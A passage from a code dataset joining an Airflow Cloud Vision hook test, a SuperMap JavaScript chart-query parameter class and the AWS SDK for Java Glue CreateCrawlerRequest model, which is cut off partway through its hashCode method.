@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.safe_search_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
| apache/incubator-airflow | tests/providers/google/cloud/hooks/test_vision.py | Python | apache-2.0 | 38,031 |
/* COPYRIGHT 2012 SUPERMAP
* 本程序只能在有效的授权许可下使用。
* 未经许可,不得以任何手段擅自使用或传播。*/
/**
* @requires SuperMap/Util.js
* @requires SuperMap/REST.js
*/
/**
* Class: SuperMap.REST.ChartQueryParameters
* 海图查询参数类,该类用于设置海图查询时的相关参数,海图查询分为海图属性
* 查询和海图范围查询两类,通过属性queryMode指定查询模式。必设属性有:
* queryMode、chartLayerNames、chartQueryFilterParameters。当进行海图范围查询时,必设属性还包括bounds。
*/
SuperMap.REST.ChartQueryParameters = SuperMap.Class({
/**
* APIProperty: queryMode
* {String} 海图查询模式类型,SuperMap iClient for JavaScript对海图支持两种
* 查询方式:海图属性查询("ChartAttributeQuery")和海图空间查询
* ("ChartBoundsQuery") 。
*/
queryMode:null,
/**
* APIProperty: bounds
* {<SuperMap.Bounds>} 海图查询范围。
*/
bounds:null,
/**
* APIProperty: chartLayerNames
* {Array(String)} 查询的海图图层的名称。
*/
chartLayerNames:null,
/**
* APIProperty: chartQueryFilterParameters
* {Array <SuperMap.REST.ChartQueryFilterParameter>} 海图查询过滤参数。
* 包括:物标代码、物标可应用对象的选择(是否查询点、线或面)、属性字
* 段过滤条件。
*/
chartQueryFilterParameters:null,
/**
* Property: returnContent
* {Boolean} 获取或设置是返回查询结果记录集 recordsets,还是返回查询结果的
* 资源 resourceInfo。默认为 true,表示返回 recordsets。
*
* note: Recordsets 和 ResourceInfo 都存储在查询结果类 QueryResult 中。
* 当
* (start code)
* ReturnContent = true
* (end)
* 表示返回查询记录集,这时
* 查询结果存储在
* (start code)
* QueryResult.Recordsets
* (end)
* 中,而
* (start code)
* QueryResult.ResourceInfo
* (end)
* 为空;当
* (start code)
* ReturnContent = false
* (end)
* 时,表示返回查询结果资源,这时查询结果存储在
* (start code)
* QueryResult.ResourceInfo
* (end)
* 中,而
* (start code)
* QueryResult.Recordsets
* (end)
* 为空。
*/
returnContent:true,
/**
* APIProperty: startRecord
* {Number} 查询起始记录位置,默认为0。
*/
startRecord:0,
/**
* APIProperty: expectCount
* {Number} 期望查询结果返回的记录数,该值大于0。
*/
expectCount:null,
/**
* Constructor: SuperMap.REST.ChartQueryParameters
* 初始化 ChartQueryParameters 类的新实例。
*
* Parameters:
* options - {Object} 参数。
*
* Allowed options properties:
* queryMode - {String} 海图查询模式类型,SuperMap iClient for JavaScript对
* 海图支持两种查询方式:海图属性查询("ChartAttributeQuery")和海图空
* 间查询("ChartBoundsQuery") 。
* bounds - {<SuperMap.Bounds>} 海图查询范围。
* chartLayerNames - {Array(String)} 查询的海图图层的名称。
* chartQueryFilterParameters - {Array <SuperMap.REST.ChartQueryFilterParameter>}
* 海图查询过滤参数。包括:物标代码、物标可应用对象的选择(是否查询点、
* 线或面)、属性字段过滤条件。
* returnContent - {Boolean} 获取或设置是返回查询结果记录集 recordsets,还
* 是返回查询结果的资源 resourceInfo。默认为 true,表示返回 recordsets。
* startRecord - {Number} 查询起始记录位置,默认为0。
* expectCount - {Number} 期望查询结果返回的记录数,该值大于0。
*/
initialize:function (options) {
if (!options) {
return;
}
SuperMap.Util.extend(this, options);
},
/**
* APIMethod: destroy
* 释放资源,将引用资源的属性置空。
*/
destroy:function () {
var me = this;
me.queryMode = null;
me.bounds = null;
me.chartLayerNames = null;
me.chartQueryFilterParameters = null;
me.returnContent = true;
me.startRecord = 0;
me.expectCount = null;
},
/**
* Method: getVariablesJson
* 将属性信息转换成能够被服务识别的JSON格式字符串。
*/
getVariablesJson:function () {
var json="";
json += "\"queryMode\":\"" + this.queryMode + "\",";
if (this.chartLayerNames && this.chartLayerNames.length) {
var chartLayersArray = [];
var layerLength = this.chartLayerNames.length;
for (var i = 0; i < layerLength; i++)
{
chartLayersArray.push("\""+this.chartLayerNames[i]+"\"");
}
var layerNames = "[" + chartLayersArray.join(",") + "]";
json += "\"chartLayerNames\":" + layerNames + ",";
}
if (this.queryMode === "ChartBoundsQuery" && this.bounds) {
json += "\"bounds\":" + "{" + "\"leftBottom\":" + "{" + "\"x\":" + this.bounds.left + "," +
"\"y\":" + this.bounds.bottom + "}" + "," + "\"rightTop\":" + "{" + "\"x\":" + this.bounds.right + "," +
"\"y\":" + this.bounds.top + "}" + "},";
}
if (this.chartQueryFilterParameters && this.chartQueryFilterParameters.length) {
var chartParamArray = [];
var chartLength = this.chartQueryFilterParameters.length;
for (var j = 0; j < chartLength; j++)
{
var chartQueryFilterParameter = new SuperMap.REST.ChartQueryFilterParameter();
chartQueryFilterParameter = this.chartQueryFilterParameters[j];
chartParamArray.push(chartQueryFilterParameter.toJson());
}
var chartParamsJson = "[" + chartParamArray.join(",") + "]";
chartParamsJson = "\"chartQueryParams\":" + chartParamsJson + ",";
chartParamsJson += "\"startRecord\":" + this.startRecord + ",";
chartParamsJson += "\"expectCount\":" + this.expectCount;
chartParamsJson = "{" + chartParamsJson + "}";
json += "\"chartQueryParameters\":" + chartParamsJson;
}
json = "{" + json + "}";
return json;
},
CLASS_NAME:"SuperMap.REST.ChartQueryParameters"
}) | SuperMap/iClient-for-JavaScript | libs/SuperMap/REST/Query/ChartQueryParameters.js | JavaScript | apache-2.0 | 6,706 |
/*
* Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.glue.model;
import java.io.Serializable;
import javax.annotation.Generated;
import com.amazonaws.AmazonWebServiceRequest;
/**
*
* @see <a href="http://docs.aws.amazon.com/goto/WebAPI/glue-2017-03-31/CreateCrawler" target="_top">AWS API
* Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class CreateCrawlerRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable {
/**
* <p>
* Name of the new crawler.
* </p>
*/
private String name;
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*/
private String role;
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*/
private String databaseName;
/**
* <p>
* A description of the new crawler.
* </p>
*/
private String description;
/**
* <p>
* A list of collection of targets to crawl.
* </p>
*/
private CrawlerTargets targets;
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
* Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*/
private String schedule;
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*/
private java.util.List<String> classifiers;
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*/
private String tablePrefix;
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*/
private SchemaChangePolicy schemaChangePolicy;
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*/
private RecrawlPolicy recrawlPolicy;
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*/
private LineageConfiguration lineageConfiguration;
private LakeFormationConfiguration lakeFormationConfiguration;
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*/
private String configuration;
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*/
private String crawlerSecurityConfiguration;
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*/
private java.util.Map<String, String> tags;
/**
* <p>
* Name of the new crawler.
* </p>
*
* @param name
* Name of the new crawler.
*/
public void setName(String name) {
this.name = name;
}
/**
* <p>
* Name of the new crawler.
* </p>
*
* @return Name of the new crawler.
*/
public String getName() {
return this.name;
}
/**
* <p>
* Name of the new crawler.
* </p>
*
* @param name
* Name of the new crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withName(String name) {
setName(name);
return this;
}
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*
* @param role
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer
* resources.
*/
public void setRole(String role) {
this.role = role;
}
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*
* @return The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer
* resources.
*/
public String getRole() {
return this.role;
}
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*
* @param role
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer
* resources.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withRole(String role) {
setRole(role);
return this;
}
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*
* @param databaseName
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
*/
public void setDatabaseName(String databaseName) {
this.databaseName = databaseName;
}
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*
* @return The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
*/
public String getDatabaseName() {
return this.databaseName;
}
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*
* @param databaseName
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withDatabaseName(String databaseName) {
setDatabaseName(databaseName);
return this;
}
/**
* <p>
* A description of the new crawler.
* </p>
*
* @param description
* A description of the new crawler.
*/
public void setDescription(String description) {
this.description = description;
}
/**
* <p>
* A description of the new crawler.
* </p>
*
* @return A description of the new crawler.
*/
public String getDescription() {
return this.description;
}
/**
* <p>
* A description of the new crawler.
* </p>
*
* @param description
* A description of the new crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withDescription(String description) {
setDescription(description);
return this;
}
/**
* <p>
* A list of collection of targets to crawl.
* </p>
*
* @param targets
* A list of collection of targets to crawl.
*/
public void setTargets(CrawlerTargets targets) {
this.targets = targets;
}
/**
* <p>
* A list of collection of targets to crawl.
* </p>
*
* @return A list of collection of targets to crawl.
*/
public CrawlerTargets getTargets() {
return this.targets;
}
/**
* <p>
* A list of collection of targets to crawl.
* </p>
*
* @param targets
* A list of collection of targets to crawl.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withTargets(CrawlerTargets targets) {
setTargets(targets);
return this;
}
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
* Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*
* @param schedule
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based
* Schedules for Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would
* specify: <code>cron(15 12 * * ? *)</code>.
*/
public void setSchedule(String schedule) {
this.schedule = schedule;
}
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
* Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*
* @return A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based
* Schedules for Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would
* specify: <code>cron(15 12 * * ? *)</code>.
*/
public String getSchedule() {
return this.schedule;
}
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
* Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*
* @param schedule
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based
* Schedules for Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would
* specify: <code>cron(15 12 * * ? *)</code>.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withSchedule(String schedule) {
setSchedule(schedule);
return this;
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*
* @return A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
*/
public java.util.List<String> getClassifiers() {
return classifiers;
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*
* @param classifiers
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
*/
public void setClassifiers(java.util.Collection<String> classifiers) {
if (classifiers == null) {
this.classifiers = null;
return;
}
this.classifiers = new java.util.ArrayList<String>(classifiers);
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
* <p>
* <b>NOTE:</b> This method appends the values to the existing list (if any). Use
* {@link #setClassifiers(java.util.Collection)} or {@link #withClassifiers(java.util.Collection)} if you want to
* override the existing values.
* </p>
*
* @param classifiers
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withClassifiers(String... classifiers) {
if (this.classifiers == null) {
setClassifiers(new java.util.ArrayList<String>(classifiers.length));
}
for (String ele : classifiers) {
this.classifiers.add(ele);
}
return this;
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*
* @param classifiers
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withClassifiers(java.util.Collection<String> classifiers) {
setClassifiers(classifiers);
return this;
}
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*
* @param tablePrefix
* The table prefix used for catalog tables that are created.
*/
public void setTablePrefix(String tablePrefix) {
this.tablePrefix = tablePrefix;
}
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*
* @return The table prefix used for catalog tables that are created.
*/
public String getTablePrefix() {
return this.tablePrefix;
}
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*
* @param tablePrefix
* The table prefix used for catalog tables that are created.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withTablePrefix(String tablePrefix) {
setTablePrefix(tablePrefix);
return this;
}
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*
* @param schemaChangePolicy
* The policy for the crawler's update and deletion behavior.
*/
public void setSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) {
this.schemaChangePolicy = schemaChangePolicy;
}
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*
* @return The policy for the crawler's update and deletion behavior.
*/
public SchemaChangePolicy getSchemaChangePolicy() {
return this.schemaChangePolicy;
}
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*
* @param schemaChangePolicy
* The policy for the crawler's update and deletion behavior.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) {
setSchemaChangePolicy(schemaChangePolicy);
return this;
}
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*
* @param recrawlPolicy
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were
* added since the last crawler run.
*/
public void setRecrawlPolicy(RecrawlPolicy recrawlPolicy) {
this.recrawlPolicy = recrawlPolicy;
}
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*
* @return A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were
* added since the last crawler run.
*/
public RecrawlPolicy getRecrawlPolicy() {
return this.recrawlPolicy;
}
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*
* @param recrawlPolicy
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were
* added since the last crawler run.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withRecrawlPolicy(RecrawlPolicy recrawlPolicy) {
setRecrawlPolicy(recrawlPolicy);
return this;
}
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*
* @param lineageConfiguration
* Specifies data lineage configuration settings for the crawler.
*/
public void setLineageConfiguration(LineageConfiguration lineageConfiguration) {
this.lineageConfiguration = lineageConfiguration;
}
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*
* @return Specifies data lineage configuration settings for the crawler.
*/
public LineageConfiguration getLineageConfiguration() {
return this.lineageConfiguration;
}
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*
* @param lineageConfiguration
* Specifies data lineage configuration settings for the crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withLineageConfiguration(LineageConfiguration lineageConfiguration) {
setLineageConfiguration(lineageConfiguration);
return this;
}
/**
* @param lakeFormationConfiguration
*/
public void setLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) {
this.lakeFormationConfiguration = lakeFormationConfiguration;
}
/**
* @return
*/
public LakeFormationConfiguration getLakeFormationConfiguration() {
return this.lakeFormationConfiguration;
}
/**
* @param lakeFormationConfiguration
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) {
setLakeFormationConfiguration(lakeFormationConfiguration);
return this;
}
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*
* @param configuration
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a
* crawler's behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
*/
public void setConfiguration(String configuration) {
this.configuration = configuration;
}
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*
* @return Crawler configuration information. This versioned JSON string allows users to specify aspects of a
* crawler's behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
*/
public String getConfiguration() {
return this.configuration;
}
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*
* @param configuration
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a
* crawler's behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withConfiguration(String configuration) {
setConfiguration(configuration);
return this;
}
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*
* @param crawlerSecurityConfiguration
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
*/
public void setCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) {
this.crawlerSecurityConfiguration = crawlerSecurityConfiguration;
}
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*
* @return The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
*/
public String getCrawlerSecurityConfiguration() {
return this.crawlerSecurityConfiguration;
}
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*
* @param crawlerSecurityConfiguration
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) {
setCrawlerSecurityConfiguration(crawlerSecurityConfiguration);
return this;
}
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*
* @return The tags to use with this crawler request. You may use tags to limit access to the crawler. For more
* information about tags in Glue, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a>
* in the developer guide.
*/
public java.util.Map<String, String> getTags() {
return tags;
}
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*
* @param tags
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more
* information about tags in Glue, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a>
* in the developer guide.
*/
public void setTags(java.util.Map<String, String> tags) {
this.tags = tags;
}
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*
* @param tags
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more
* information about tags in Glue, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a>
* in the developer guide.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withTags(java.util.Map<String, String> tags) {
setTags(tags);
return this;
}
/**
* Add a single Tags entry
*
* @see CreateCrawlerRequest#withTags
* @returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest addTagsEntry(String key, String value) {
if (null == this.tags) {
this.tags = new java.util.HashMap<String, String>();
}
if (this.tags.containsKey(key))
throw new IllegalArgumentException("Duplicated keys (" + key.toString() + ") are provided.");
this.tags.put(key, value);
return this;
}
/**
* Removes all the entries added into Tags.
*
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest clearTagsEntries() {
this.tags = null;
return this;
}
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getName() != null)
sb.append("Name: ").append(getName()).append(",");
if (getRole() != null)
sb.append("Role: ").append(getRole()).append(",");
if (getDatabaseName() != null)
sb.append("DatabaseName: ").append(getDatabaseName()).append(",");
if (getDescription() != null)
sb.append("Description: ").append(getDescription()).append(",");
if (getTargets() != null)
sb.append("Targets: ").append(getTargets()).append(",");
if (getSchedule() != null)
sb.append("Schedule: ").append(getSchedule()).append(",");
if (getClassifiers() != null)
sb.append("Classifiers: ").append(getClassifiers()).append(",");
if (getTablePrefix() != null)
sb.append("TablePrefix: ").append(getTablePrefix()).append(",");
if (getSchemaChangePolicy() != null)
sb.append("SchemaChangePolicy: ").append(getSchemaChangePolicy()).append(",");
if (getRecrawlPolicy() != null)
sb.append("RecrawlPolicy: ").append(getRecrawlPolicy()).append(",");
if (getLineageConfiguration() != null)
sb.append("LineageConfiguration: ").append(getLineageConfiguration()).append(",");
if (getLakeFormationConfiguration() != null)
sb.append("LakeFormationConfiguration: ").append(getLakeFormationConfiguration()).append(",");
if (getConfiguration() != null)
sb.append("Configuration: ").append(getConfiguration()).append(",");
if (getCrawlerSecurityConfiguration() != null)
sb.append("CrawlerSecurityConfiguration: ").append(getCrawlerSecurityConfiguration()).append(",");
if (getTags() != null)
sb.append("Tags: ").append(getTags());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof CreateCrawlerRequest == false)
return false;
CreateCrawlerRequest other = (CreateCrawlerRequest) obj;
if (other.getName() == null ^ this.getName() == null)
return false;
if (other.getName() != null && other.getName().equals(this.getName()) == false)
return false;
if (other.getRole() == null ^ this.getRole() == null)
return false;
if (other.getRole() != null && other.getRole().equals(this.getRole()) == false)
return false;
if (other.getDatabaseName() == null ^ this.getDatabaseName() == null)
return false;
if (other.getDatabaseName() != null && other.getDatabaseName().equals(this.getDatabaseName()) == false)
return false;
if (other.getDescription() == null ^ this.getDescription() == null)
return false;
if (other.getDescription() != null && other.getDescription().equals(this.getDescription()) == false)
return false;
if (other.getTargets() == null ^ this.getTargets() == null)
return false;
if (other.getTargets() != null && other.getTargets().equals(this.getTargets()) == false)
return false;
if (other.getSchedule() == null ^ this.getSchedule() == null)
return false;
if (other.getSchedule() != null && other.getSchedule().equals(this.getSchedule()) == false)
return false;
if (other.getClassifiers() == null ^ this.getClassifiers() == null)
return false;
if (other.getClassifiers() != null && other.getClassifiers().equals(this.getClassifiers()) == false)
return false;
if (other.getTablePrefix() == null ^ this.getTablePrefix() == null)
return false;
if (other.getTablePrefix() != null && other.getTablePrefix().equals(this.getTablePrefix()) == false)
return false;
if (other.getSchemaChangePolicy() == null ^ this.getSchemaChangePolicy() == null)
return false;
if (other.getSchemaChangePolicy() != null && other.getSchemaChangePolicy().equals(this.getSchemaChangePolicy()) == false)
return false;
if (other.getRecrawlPolicy() == null ^ this.getRecrawlPolicy() == null)
return false;
if (other.getRecrawlPolicy() != null && other.getRecrawlPolicy().equals(this.getRecrawlPolicy()) == false)
return false;
if (other.getLineageConfiguration() == null ^ this.getLineageConfiguration() == null)
return false;
if (other.getLineageConfiguration() != null && other.getLineageConfiguration().equals(this.getLineageConfiguration()) == false)
return false;
if (other.getLakeFormationConfiguration() == null ^ this.getLakeFormationConfiguration() == null)
return false;
if (other.getLakeFormationConfiguration() != null && other.getLakeFormationConfiguration().equals(this.getLakeFormationConfiguration()) == false)
return false;
if (other.getConfiguration() == null ^ this.getConfiguration() == null)
return false;
if (other.getConfiguration() != null && other.getConfiguration().equals(this.getConfiguration()) == false)
return false;
if (other.getCrawlerSecurityConfiguration() == null ^ this.getCrawlerSecurityConfiguration() == null)
return false;
if (other.getCrawlerSecurityConfiguration() != null && other.getCrawlerSecurityConfiguration().equals(this.getCrawlerSecurityConfiguration()) == false)
return false;
if (other.getTags() == null ^ this.getTags() == null)
return false;
if (other.getTags() != null && other.getTags().equals(this.getTags()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime * hashCode + ((getName() == null) ? 0 : getName().hashCode());
hashCode = prime * hashCode + ((getRole() == null) ? 0 : getRole().hashCode());
hashCode = prime * hashCode + ((getDatabaseName() == null) ? 0 : getDatabaseName().hashCode());
hashCode = prime * hashCode + ((getDescription() == null) ? 0 : getDescription().hashCode());
hashCode = prime * hashCode + ((getTargets() == null) ? 0 : getTargets().hashCode());
hashCode = prime * hashCode + ((getSchedule() == null) ? 0 : getSchedule().hashCode());
hashCode = prime * hashCode + ((getClassifiers() == null) ? 0 : getClassifiers().hashCode());
hashCode = prime * hashCode + ((getTablePrefix() == null) ? 0 : getTablePrefix().hashCode());
hashCode = prime * hashCode + ((getSchemaChangePolicy() == null) ? 0 : getSchemaChangePolicy().hashCode());
hashCode = prime * hashCode + ((getRecrawlPolicy() == null) ? 0 : getRecrawlPolicy().hashCode());
hashCode = prime * hashCode + ((getLineageConfiguration() == null) ? 0 : getLineageConfiguration().hashCode());
